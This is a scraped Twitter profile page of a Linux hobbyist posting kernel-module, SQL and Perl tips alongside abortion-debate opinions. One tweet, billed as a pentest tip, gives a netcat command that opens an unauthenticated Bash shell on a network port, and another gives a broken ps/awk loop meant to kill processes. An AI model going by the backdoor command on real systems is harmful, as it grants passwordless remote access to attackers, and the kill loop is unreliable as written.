Tweetovi

Blokirali ste korisnika/cu @k3rn3lhack3r

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @k3rn3lhack3r

  1. Prikvačeni tweet
    15. sij

    A basic Kernel module, enough to be dangerous: The header section: <linux/init.h> <linux/module.h> <linux/kernel.h>

    Prikaži ovu nit
    Poništi
  2. proslijedio/la je Tweet
    1. velj

    Androids are better than iPhones. Cry about it.

    Prikaži ovu nit
    Poništi
  3. 30. sij

    I love this, grep is quite possibly the best tool on Linux. Use it with awk (and sometimes sed) and you can produce some powerful scripts on the fly ; e.g., ps -ef | grep <user> | awk '{print $1}' > pid.txt ; for pid in `cat file.txt` do kill -9 ; done

    Poništi
  4. 29. sij

    So, I was asked if i'd be OK with being raped (forced to impregnate people against my will). I'd have thought the obvious answer to being asked if one is OK with being raped is usually No. Therefore, why ask if i'm OK with being raped?

    Poništi
  5. 29. sij

    Unethical people have always done unethical things, and always will do unethical things. The solution: make unethical things legal.

    Poništi
  6. 28. sij

    [Warning: logic ahead] The number of pregnancies that I have had do not determine the validity of my argument. It's valid when the antecedent & consequent are both true: P -> Q P Therefore, Q You are arguing: P -> Q only IF person X had Y number of pregnancies. INCONCEIVABLE

    Poništi
  7. 28. sij

    I'll just leave this here, and let her words speak for themselves.

    Poništi
  8. 28. sij

    Apparently having a career is one of the criteria for determining the right to life. I guess that means it's open season on the unemployed, disabled, elderly and schoolchildren.

    Poništi
  9. 27. sij

    I've coded a simple wrapper in for some common pentest tools (nothing fancy, just 25 mins work whilst watching Call the Midwife). Please feel free to clone the repo & hack. I'll add more options if requested.

    Prikaži ovu nit
    Poništi
  10. 26. sij

    Pong AI on my Pebble Watch (N.B. it runs on Linux).

    Poništi
  11. 26. sij

    Take a bog standard android tablet, install Ubuntu using Userland, pair with bluetooth keyboard & mouse and you got yourself a full blown Linux server/workstation.

    Poništi
  12. 23. sij

    Run Linux in a web browser

    Poništi
  13. 16. sij

    How many times must I repeat this to the mafia until they finally get it? 01100010 01100001 01100010 01111001 01110011 01100010 01101111 01100100 01111001 01100010 01100001 01100010 01111001 01110011 01100011 01101000 01101111 01101001 01100011 01100101

    Poništi
  14. 16. sij

    LINUX PENTEST TIP USING NETCAT. You can create a Bash backdoor with: sudo nc -v -l -p 9999 -p /bin/bash You can now connect to port 9999 with nc, and be given a full Bash shell without a password: nc [ip address] 9999

    Poništi
  15. 16. sij

    SQL INDEX TIPS alter table [tablename] add index [indexname](index1, index2) <- Add index [indexname] to table [tablename] show index from [tablename] <- list indexes on [tablename] drop index [indexname] on [tablename] <- deletes index.

    Poništi
  16. 16. sij

    PERL TIPS push , <- goes to end of = pop <- taken from end of = shift <- taken from start of unshift , <- added to start of

    Poništi
  17. 15. sij

    Commands for loading,viewing and unloading the basicmod Kernel module: sudo insmod basicmod.ko <- Load the mod into the Kernel. lsmod | grep basicmod <- Show the mod is loaded. sudo rmmod basicmod <- Remove the mod from the kernel.

    Poništi
  18. 15. sij

    Bare minimum Makefile for Kernel module: obj-m += basicmod.o all: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules clean: make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean

    Poništi
  19. 15. sij

    And finally, call both methods: module_init(basicmod_init); module_exit(basicmod_exit);

    Prikaži ovu nit
    Poništi
  20. 15. sij

    Exit method: static void __exit basicmod_exit(void) { printk(KERN_INFO "Goodbye, Linux Kernel\n"); }

    Prikaži ovu nit
    Poništi
  21. 15. sij

    Init method: static int __init basicmod_init(void) { printk(KERN_INFO "Hello, Linux Kernel\n"); return 0; }

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·